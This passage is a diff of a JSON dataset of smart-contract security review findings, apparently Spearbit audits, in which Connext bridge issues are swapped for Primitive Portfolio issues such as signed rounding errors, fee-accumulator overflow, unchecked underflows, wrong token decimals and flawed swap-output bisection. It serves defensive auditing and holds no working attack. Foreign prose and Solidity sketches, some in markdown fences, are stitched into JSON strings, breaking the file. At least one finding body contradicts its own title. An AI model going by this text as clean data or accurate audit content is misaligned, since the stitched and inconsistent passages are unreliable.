calls to xcall... or addRouterLiquidity...
can be DoSed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The owner or an admin can front-run (or it can happen by accident) a call that: A router has made on a canonical domain of a canonical token to supply that token as liquidity OR A user has made to xcall... supplying a canonical token on its canonical domain. The front-running call would set the cap to a low number (calling updateLiquidityCap). This would cause the calls mentioned in the bullet list to fail due to the checks against IERC20(_local).balanceOf(address(this)).", + "title": "Rounding functions are wrong for negative integers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The AssemblyLib.scaleFromWadUpSigned and AssemblyLib.scaleFromWadDownSigned both work on int256s and therefore also on negative integers. However, the rounding is wrong for these. Rounding down should mean rounding towards negative infinity, and rounding up should mean rounding towards positive infinity. The scaleFromWadDownSigned only performs a truncation, rounding negative integers towards zero. This function is used in checkInvariant to ensure the next invariant is not less than the live invariant in a swap: int256 liveInvariantWad = invariant.scaleFromWadDownSigned(pools[poolId].pair.decimalsQuote); int256 nextInvariantWad = nextInvariant.scaleFromWadDownSigned( pools[poolId].pair.decimalsQuote ); nextInvariantWad >= liveInvariantWad It can happen for quote tokens with fewer decimals, for example, 6 with USDC, that liveInvariantWad was rounded from a positive 0.9999e12 value to zero. And nextInvariantWad was rounded from a negative value of -0.9999e12 to zero. The check passes even though the invariant is violated by almost 2 quote token units.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Medium Risk" ] }, { - "title": "Missing a check against address(0) in ConnextPriceOracle's constructor", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "When ConnextPriceOracle is deployed an address _wrapped is passed to its constructor. The current codebase does not check whether the passed _wrapped can be an address(0) or not.", + "title": "LPs can lose fees if fee growth accumulator overflows their checkpoint", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "Fees (that are not reinvested in the pool) are currently tracked through an accumulator value pool.feeGrowthGlobalAsset and pool.feeGrowthGlobalQuote, computed as asset or quote per liquidity. Each user providing liquidity has a checkpoint of these values from their last sync (claim). When syncing new fees, the distance from the current value to the user's checkpoint is computed and multiplied by their liquidity. The accumulator values are deliberately allowed to overflow as only the distance matters. However, if an LP does not sync its fees and the accumulator grows, overflows, and grows larger than their last checkpoint, the LP loses all fees. Example: User allocates at pool.feeGrowthGlobalAsset = 1000e36. pool.feeGrowthGlobalAsset grows and overflows to 0; differenceAsset is still accurate. pool.feeGrowthGlobalAsset grows more and is now at 1000e36 again; differenceAsset will be zero.
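The wraparound can be made concrete, assuming computeCheckpointDistance is (or behaves like) a wrapping subtraction:

function checkpointDistance(uint256 current, uint256 last) internal pure returns (uint256 d) {
    unchecked {
        d = current - last; // wraps mod 2**256, which is why a single accumulator overflow is normally harmless
    }
}
// with last = 1000e36: once the accumulator wraps all the way around and reaches exactly
// 1000e36 again, checkpointDistance returns 0 and every fee earned in between is lost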
If the user only claims their fees now, they'll earn 0 fees.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Medium Risk" ] }, { - "title": "_executeCalldata() can revert if insufficient gas is supplied", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function _executeCalldata() contains the statement gasleft() - 10_000. This statement can revert if the available gas is less than 10_000. Perhaps this is the expected behaviour. Note: From the Tangerine Whistle fork only a maximum 63/64 of the available gas is sent to the contract being called. Therefore, 1/64th is left for the calling contract. function _executeCalldata(...) ... { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall(_params.to, gasleft() - 10_000, ... ); ... }", + "title": "Unnecessary left shift in encodePoolId", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The encodePoolId performs a left shift of 0. This is a no-op.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Gas Optimization" ] }, { - "title": "Be aware of precompiles", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The external calls by _executeCalldata() could call a precompile. Different chains have creative precompile implementations, so this could in theory pose problems. For example precompile 4 copies memory: what-s-the-identity-0x4-precompile Note: precompiles link to dedicated pieces of code written in Rust or Go that can be called from the EVM. Here are a few links for documentation on different chains: moonbeam precompiles, astar precompiles function _executeCalldata(...) ... { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall( _params.to, ...); } else { returnData = IXReceiver(_params.to).xReceive(...); } ... }", + "title": "_syncPool performs unnecessary pool state updates", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The _syncPool function is only called during a swap. During a swap the liquidity never changes and the pool's last timestamp has already been updated in _beforeSwapEffects.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Gas Optimization" ] }, { - "title": "Upgrade to solidity 0.8.17", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Solidity 0.8.17 released a bugfix where the optimizer could incorrectly remove storage writes if the code fit a certain pattern (see this security alert). This bug was introduced in 0.8.13. Since Connext is using the legacy code generation pipeline, i.e., compiling without the via-IR flag, the current code is not at risk. This is because assembly blocks don't write to storage. However, if this changes and Connext compiles through via-IR code generation, the code is more likely to be affected.
One reason to use this code generation pipeline could be to enable gas optimizations not available in legacy code generation.", + "title": "Portfolio.sol gas optimizations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "Throughout the contract we've identified a number of minor gas optimizations that can be performed. We've gathered them into one issue to keep the number of issues as small as possible. L750 The msg.value > 0 check is done also in the __wrapEther__ call L262 The following substitutions can be optimized in case assets are 0 by moving each instruction within the ifs on lines 256-266 pos.tokensOwedAsset -= claimedAssets.safeCastTo128(); pos.tokensOwedQuote -= claimedQuotes.safeCastTo128(); L376 Consider using the pool object (if it remains as a storage object) instead of pools[args.poolId] L444:L445 The following two instructions can be grouped into one. output = args.output; output = output.scaleToWad(... L436:L443 The internalBalance variable can be discarded since it is used only within the input assignment. uint256 internalBalance = getBalance( msg.sender, _state.sell ? pool.pair.tokenAsset : pool.pair.tokenQuote ); input = args.useMax == 1 ? internalBalance : args.input; input = input.scaleToWad( _state.sell ? pool.pair.decimalsAsset : pool.pair.decimalsQuote ); L808 Assuming that the swap instruction will be one of the most used instructions, it might be worth moving it to be the first if condition to save gas. L409 The if (args.input == 0) revert ZeroInput(); can be removed as it will result in iteration.input being zero and reverting on L457.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Gas Optimization" ] }, { - "title": "Add domain check in setupAssetWithDeployedRepresentation()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function setupAssetWithDeployedRepresentation() links a new _representation asset. However, this should not be done on the canonical domain, so it is good to check this to prevent potential mistakes. function setupAssetWithDeployedRepresentation(...) ... { bytes32 key = _enrollAdoptedAndLocalAssets(_adoptedAssetId, _representation, _stableSwapPool, _canonical); ... }", + "title": "Incomplete NatSpec comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "Throughout the IPortfolio.sol interface, various NatSpec comments are missing or incomplete.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "If an adopted token and its canonical live on the same domain the cap for the custodied amount is applied for each of those tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "If _local is an adopted asset that lives on its canonical's original chain, then we are comparing the to-be-updated balance of this contract (custodied) with s.caps[key]. That means we are also comparing the balance of an adopted asset with the property above with the cap. For example, if A is the canonical token and B the adopted, then cap = s.caps[key] is used to cap the custodied amount in this contract for both of those tokens. So if the cap is 1000, the contract can have a balance of 1000 A and 1000 B, which is twice the amount meant to be capped.
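A minimal sketch, assuming power-of-ten WAD scaling and decimals <= 18, of a sign-aware scaleFromWadDownSigned for the earlier "Rounding functions are wrong for negative integers" finding: rounding down must floor toward negative infinity, while Solidity's `/` truncates toward zero.

```solidity
library RoundingSketch {
    function scaleFromWadDownSigned(int256 amountWad, uint256 decimals)
        internal pure returns (int256)
    {
        int256 factor = int256(10 ** (18 - decimals)); // assumes decimals <= 18
        int256 quotient = amountWad / factor;          // truncates toward zero
        // Correct the truncation for negative, non-exact quotients so that
        // e.g. -0.9999e12 WAD scales to -1 (floor), not 0.
        if (amountWad % factor != 0 && amountWad < 0) quotient--;
        return quotient;
    }
}
```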
This is true basically for any approved asset with the above properties. When the owner or the admin calls setupAsset: // File: https://github.com/connext/nxtp/blob/32a0370edc917cc45c231565591740ff274b5c05/packages/deployments/contracts/contracts/core/connext/facets/TokenFacet.sol#L164-L172 function setupAsset( TokenId calldata _canonical, uint8 _canonicalDecimals, string memory _representationName, string memory _representationSymbol, address _adoptedAssetId, address _stableSwapPool, uint256 _cap ) external onlyOwnerOrAdmin returns (address _local) { such that _canonical.domain == s.domain and _adoptedAssetId != 0, then this asset has the property in question.", + "title": "Inaccurate Comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "These comments are inaccurate. [1] The hex value on this line translates to v0.1.0-beta instead of v1.0.0-beta. [2] computeTau returns either the time until pool maturity, or zero if the pool is already expired. [3] These comments do not properly account for the two byte offset from the start of the array (in L94, only in the endpoint of the slice).", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "There are no checks/constraints against the _representation provided to setupAssetWithDeployedRepresentation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "setupAssetWithDeployedRepresentation is similar to setupAsset in terms of functionality, except it does not deploy a representation token if necessary. It actually uses the _representation address given as the representation token. The _representation parameter given does not have any checks in terms of functionality compared to setupAsset, which deploys a new BridgeToken instance: // File: packages\deployments\contracts\contracts\core\connext\facets\TokenFacet.sol#L399 _token = address(new BridgeToken(_decimals, _name, _symbol)); Basically, representation needs to implement IBridgeToken (mint, burn, setDetails, ... ) and some sort of IERC20. Otherwise, if a function from IBridgeToken is not implemented or if it does not have IERC20 functionality, it can cause failures/reverts in some functions in this codebase. Another important point is that the decimals for _representation should be equal to the decimals precision of the canonical token, and _representation should not be able to update/change its decimals. Also, this opens an opportunity for a bad owner or admin to provide a malicious _representation to this function. This does not have to be a malicious act; it can also happen by mistake, for example by an admin. Additionally, the Connext Diamond must have the \"right\" to mint() and burn() the tokens.", + "title": "Check for priorityFee should have its own custom error", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The check for invalid priorityFee within the checkParameters function uses the same custom error as the one for fee.
This could lead to confusion in the error output.", "labels": [ - "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Spearbit", + "Primitive", + "Severity: Informational" ] }, { - "title": "In dequeueVerified when no verified items are found in the queue last == first - 1", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The comment in dequeueVerified mentions that when no verified items are found in the queue, then last == first. But this is not true since the loop condition is last >= first and the loop only terminates (not considering the break) when last == first - 1. It is important to correct this incorrect statement in the comment, since a dev/user could mistakenly take this statement as true and modify/use the code with this incorrect assumption in mind.", + "title": "Unclear @dev comment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "This comment is misleading. It implies that cache is used to \"check\" state while it in fact changes it.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "Dirty bytes in _loc and _len can override other values when packing a typed memory view in unsafeBuildUnchecked", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "For a TypedMemView, the location and the length are supposed to occupy 12 bytes (uint96) each, but the type used for these values in the input parameters of unsafeBuildUnchecked is uint256. This would allow those values to carry dirty bytes, and when the following calculations are performed: newView := shl(96, or(newView, _type)) // insert type newView := shl(96, or(newView, _loc)) // insert loc newView := shl(24, or(newView, _len)) // empty bottom 3 bytes _loc can potentially manipulate the type section of the view and _len can potentially manipulate both the _loc and the _type sections.", + "title": "Unused custom error", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "Unused error error AlreadySettled();", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "To use sha2, hash160 and hash256 of TypedMemView the hard-coded precompile addresses would need to be checked to make sure they return the corresponding hash values.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "sha2, hash160 and hash256 assume that the precompile contracts at address(2) and address(3) calculate and return the sha256 and ripemd160 hashes of the provided memory chunks. These assumptions depend on the chain that the project is going to be deployed on.", + "title": "Use named constants", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The decodeSwap function compares a value against the constant 6. This value indicates the SWAP_ASSET constant.
sellAsset := eq(6, and(0x0F, byte(0, value)))", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "sha2, hash160 and hash256 of TypedMemView.sha2 do not clear the memory after calculating the hash", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "When a call to the precompile contract at address(2) (or at address(3)) is made, the returned value is placed at the slot pointed to by the free memory pointer and then placed on the stack. The free memory pointer is not incremented to account for this used memory position, nor does the code try to clean this 32-byte memory slot. Therefore, after a call to sha2, hash160 or hash256, we would end up with dirty bytes.", + "title": "scaleFromWadUp and scaleFromWadUpSigned can underflow", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The scaleFromWadUp and scaleFromWadUpSigned will underflow if the amountWad parameter is 0 because they perform an unchecked subtraction on it: outputDec := add(div(sub(amountWad, 1), factor), 1) // ((a-1) / b) + 1", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "Fee on transfer token support", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "It seems that only the addLiquidity function currently supports fee-on-transfer tokens. All other operations like swapping prohibit fee-on-transfer tokens. Note: The SwapUtilsExternal.sol contract allows fee-on-transfer tokens and, as per the product team, this is expected for this token.", + "title": "AssemblyLib.pack does not clear lower's upper bits", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The pack function packs the 4 lower bits of two bytes into a single byte. If the lower parameter has dirty upper bits, they will be mixed with the higher byte and be set on the final return value.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "Fee on transfer tokens can get the transaction stuck", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Consider the following scenario. 1. Assume a user has made an xcall with amount A of token X with calldata C1. Since there was no fee while transferring funds, the transfer was a success. 2. Now, before this amount can be transferred on the destination domain, token X introduced a fee on transfer. 3. A relayer now executes this transaction on the destination domain via the _handleExecuteTransaction function on BridgeFacet.sol#L756. 4. This transfers the amount A of token X to the destination domain, but since the fee on this token has now been introduced, the destination domain receives amount A-delta. 5.
The calldata is called on the destination domain, but the amount passed is A instead of A-delta, so if the IXReceiver has an amount check then it will fail, because it will now expect amount A when it really got A-delta.", + "title": "AssemblyLib.toBytes8/16 functions assume a max raw length of 16", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The toBytes16 function only works if the length of the bytes raw parameter is at most 16 because of the unchecked subtraction: let shift := mul(sub(16, mload(raw)), 8) The same issue exists for the toBytes8 function.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "Initial Liquidity Provider can trick the system", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Since there is no cap on the amount which the initial depositor can deposit, an attacker can trick the system into bypassing admin fees for other users by selling liquidity at half admin fees. Consider the following scenario. 1. User A provides the first liquidity of a huge amount. 2. Since there aren't any fees on initial liquidity, admin fees are not collected from User A. 3. Now User A can sell their liquidity to other users with half admin fees. 4. Other users can mint larger liquidity due to the lower fees, and User A also gets the benefit of adminFees/2.", + "title": "PortfolioLib.maturity returns wrong value for perpetual pools", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "A pool can be a perpetual pool that is modeled as a pool with a time to maturity always set to 1 year in computeTau. However, the maturity function does not return this same maturity. This currently isn't a problem as maturity is only called from computeTau in case it is not a perpetual pool.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "Ensure non-zero local asset in _xcall()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The local asset fetched in _xcall() is not verified to be a non-zero address. In case token mappings are not updated correctly, and to future-proof against later changes, it's better to revert if a zero address local asset is fetched. local = _getLocalAsset(key, canonical.id, canonical.domain);", + "title": "_createPool has incomplete NatSpec and event args", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The _createPool function contains incomplete NatSpec specifications. Furthermore, the event emitted by this function can be improved by adding more arguments.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "Use ExcessivelySafeCall to call xReceive()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "ExcessivelySafeCall is used to call xReceive(). This is done to avoid copying a large amount of return data in memory. This same attack vector exists for non-reconciled transfers, however in this case a usual function call is made for xReceive().
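A minimal sketch (assumed naming) of a zero-safe ceiling division for the scaleFromWadUp underflow finding above: the audited form `((a - 1) / b) + 1` wraps in unchecked assembly when a == 0.

```solidity
library ScaleUpSketch {
    function scaleFromWadUp(uint256 amountWad, uint256 factor)
        internal pure returns (uint256)
    {
        if (amountWad == 0) return 0;        // guard the a == 0 case explicitly
        return (amountWad - 1) / factor + 1; // ceil division, safe for a > 0
    }
}
```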
However, in case non-reconciled calls fail due to this error, they can always be retried after reconciliation.", + "title": "_liquidityPolicy is cast to a uint8 but it should be a uint16", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "During _createPool the pool curve parameters are set. One of them is the jit parameter, which is a uint16. It can be assigned the default value of _liquidityPolicy, but it is cast to a uint8. If the _liquidityPolicy constant is ever changed to a value greater than type(uint8).max, a wrong jit value will be assigned.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "A router's liquidity might get trapped if the router is removed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "If the owner or a user with the Role.Router role removes a router that does not implement calling removeRouterLiquidity or removeRouterLiquidityFor, then any liquidity remaining in the contract for the removed router cannot be transferred back to the router.", + "title": "Update _feeSavingEffects documentation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The _feeSavingEffects documentation states: @return bool True if the fees were saved in positions owed tokens instead of re-invested.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "In-flight transfers by the relayer can be reverted when setMaxRoutersPerTransfer is called beforehand with a lower number", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "For in-flight transfers where an approved sequencer has picked and signed an x number of routers for a transfer, from the time a relayer or another 3rd party grabs this ExecuteArgs _args to the time this party submits it to the destination domain by calling execute on a connext instance, the owner or an admin can call setMaxRoutersPerTransfer with a number lower than x, on purpose or not. This would cause the call to execute to revert with BridgeFacet__execute_maxRoutersExceeded.", + "title": "Document checkInvariant and resolve confusing naming", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The checkInvariant function's return values are undocumented and the variable names used are confusing.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "All the privileged users that can call withdrawSwapAdminFees would need to trust each other", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The owner needs to trust all the admins and also all admins need to trust each other, since any admin can call the withdrawSwapAdminFees endpoint to withdraw all the pool's admin fees into their account.", + "title": "Token amounts are in wrong decimals if useMax parameter is used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The allocate and swap functions have a useMax parameter that sets the token amounts to be used to the net balance of the contract.
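A minimal sketch (assumed semantics) of a mask-safe AssemblyLib.pack for the "does not clear lower's upper bits" finding above: without the 0x0F mask, dirty upper bits of `lower` leak into the packed high nibble.

```solidity
library PackSketch {
    function pack(bytes1 upper, bytes1 lower) internal pure returns (bytes1) {
        // Shifting `upper` left discards its own high nibble; masking `lower`
        // clears its dirty upper bits before combining the two nibbles.
        return (upper << 4) | (lower & bytes1(0x0F));
    }
}
```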
This net balance is the return value of a getNetBalance call, which is in token decimals. The code that follows (getPoolMaxLiquidity for allocate, iteration.input for swap) expects these amounts to be in WAD units. Using this parameter with tokens that don't have 18 decimals does not work correctly. The actual tokens used will be far lower than the expected amount to be used, which will lead to user loss as the tokens remain in the contract after the action.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: High Risk" ] }, { - "title": "The supplied _a to initializeSwap cannot be directly updated but only ramped", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Once a swap is initialized by the owner or an admin (indexed by the key parameter), the supplied _a (the scaled amplification coefficient, A*n^(n-1)) to initializeSwap cannot be directly updated but only ramped. The owner or the admin can still call rampA to update _a, but it will take some time for it to reach the desired value. This is mostly important if by mistake an incorrect value for _a is provided to initializeSwap.", + "title": "getAmountOut underestimates outputs leading to losses", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "When computing the output, the getAmountOut performs a bisection. However, this bisection returns any root of the function, not the lowest root. As the invariant is far from being strictly monotonic in R_x, it contains many neighbouring roots (> 2e9 in the example) and it's important to return the lowest root, corresponding to the lowest nextDependent, i.e., it leads to a larger output amount amountOut = prevDependent - nextDependent. Users using this function to estimate their outputs can incur significant losses. Example: Calling getAmountOut(poolId, false, 1, 0, address(0)) with the pool configuration in the example will return amtOut = 123695775, whereas the real max possible amtOut for that swap is 33x higher at 4089008108. The core issue is that the invariant is not strictly monotonic, invariant(R_x, R_y) = invariant(R_x + 2_852_050_358, R_y); there are many neighbouring roots for the pool configuration: function test_eval() public { uint128 R_y = 56075575; uint128 R_x = 477959654248878758; uint128 stk = 117322822; uint128 vol = 406600000000000000; uint128 tau = 2332800; int256 prev = Invariant.invariant({R_y: R_y, R_x: R_x, stk: stk, vol: vol, tau: tau}); // this is the actual dependent that still satisfies the invariant R_x -= 2_852_050_358; int256 post = Invariant.invariant({R_y: R_y, R_x: R_x, stk: stk, vol: vol, tau: tau}); console2.log(\"prev: %s\", prev); console2.log(\"post: %s\", post); assertEq(post, prev); assertEq(post, 0); }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Medium Risk" ] }, { - "title": "Inconsistent behavior when xcall with a non-existent _params.to", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "An xcall with a non-existent _params.to behaves differently depending on the path taken. 1. Fast Liquidity Path - Use IXReceiver(_params.to).xReceive. The _executeCalldata function will revert if _params.to is non-existent, which technically means that the execution has failed. 2. Slow Path - Use ExcessivelySafeCall.excessivelySafeCall.
This function uses the low-level call, which will not revert and will return true if the _params.to is non-existent. The _executeCalldata function will return with success set to True, which means the execution has succeeded.", + "title": "getAmountOut Calculates an Output Value That Sets the Invariant to Zero, Instead of Preserving Its Value", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The swap function enforces that the pool's invariant value does not decrease; however, the getAmountOut function computes an expected swap output based on setting the pool's invariant to zero, which is only equivalent if the initial value of the invariant was already zero, and that will generally not be the case as fees accrue and time passes. This is because in computeSwapStep (invoked by getAmountOut [1]), the function (optimizeDependentReserve) passed [2] to the bisection algorithm for root finding returns just the invariant evaluated on the current arguments [3] instead of the difference between the evaluated and original invariant. As a consequence, getAmountOut will return an inaccurate result when the starting value of the invariant is non-zero, leading to either disadvantageous swaps or swaps that revert, depending on whether the current pool invariant value is less than or greater than zero.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Medium Risk" ] }, { - "title": "The lpToken cloned in initializeSwap cannot be updated", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Once a swap is initialized by the owner or an admin (indexed by the key parameter), an LPToken lpToken is created by cloning the lpTokenTargetAddress provided to the initializeSwap endpoint. There is no restriction on lpTokenTargetAddress except that it would need to be LPToken-like, but it can be malicious under the hood or have some security vulnerabilities, so it cannot be trusted.", + "title": "getAmountOut Does Not Adjust The Pool's Reserve Values Based on the liquidityDelta Parameter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The liquidityDelta parameter allows a caller to adjust the liquidity in a pool before simulating a swap. However, corresponding adjustments are not made to the per-pool reserves, virtualX and virtualY. This makes the reserve-to-liquidity ratios used in the calculations incorrect, leading to inaccurate results (or potentially reverts if the invalid values fall outside of allowed ranges). Use of the inaccurate swap outputs could lead either to swaps at bad prices or swaps that revert unexpectedly.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Medium Risk" ] }, { - "title": "Lack of zero check", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Consider the following scenarios. Instance 1 - BridgeFacet.addSequencer The addSequencer function of BridgeFacet.sol does not check that the sequencer address is not zero before adding them.
function addSequencer(address _sequencer) external onlyOwnerOrAdmin { if (s.approvedSequencers[_sequencer]) revert BridgeFacet__addSequencer_alreadyApproved(); s.approvedSequencers[_sequencer] = true; emit SequencerAdded(_sequencer, msg.sender); } If there is a mistake during initialization or upgrade, and s.approvedSequencers[0] is set to true, anyone might be able to craft a payload to execute on the bridge, because the attacker can bypass the following validation within the execute function. if (!s.approvedSequencers[_args.sequencer]) { revert BridgeFacet__execute_notSupportedSequencer(); } Instance 2 - BridgeFacet.enrollRemoteRouter The enrollRemoteRouter function of BridgeFacet.sol does not check that the domain or router address is not zero before adding them. function enrollRemoteRouter(uint32 _domain, bytes32 _router) external onlyOwnerOrAdmin { // Make sure we aren't setting the current domain as the connextion. if (_domain == s.domain) { revert BridgeFacet__addRemote_invalidDomain(); } s.remotes[_domain] = _router; emit RemoteAdded(_domain, TypeCasts.bytes32ToAddress(_router), msg.sender); } Instance 3 - TokenFacet._enrollAdoptedAndLocalAssets The _enrollAdoptedAndLocalAssets function of TokenFacet.sol does not check that the _canonical.domain and _canonical.id are not zero before adding them. function _enrollAdoptedAndLocalAssets( address _adopted, address _local, address _stableSwapPool, TokenId calldata _canonical ) internal returns (bytes32 _key) { // Get the key _key = AssetLogic.calculateCanonicalHash(_canonical.id, _canonical.domain); // Get true adopted address adopted = _adopted == address(0) ? _local : _adopted; // Sanity check: needs approval if (s.approvedAssets[_key]) revert TokenFacet__addAssetId_alreadyAdded(); // Update approved assets mapping s.approvedAssets[_key] = true; // Update the adopted mapping using convention of local == adopted iff (_adopted == address(0)) s.adoptedToCanonical[adopted].domain = _canonical.domain; s.adoptedToCanonical[adopted].id = _canonical.id; These two values are used for generating the key to determine if a particular asset has been approved. Additionally, a zero value is treated as a null check within the AssetLogic.getCanonicalTokenId function: // Check to see if candidate is an adopted asset. _canonical = s.adoptedToCanonical[_candidate]; if (_canonical.domain != 0) { // Candidate is an adopted asset, return canonical info. return _canonical; }", + "title": "Bisection always uses max iterations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The current bisection algorithm 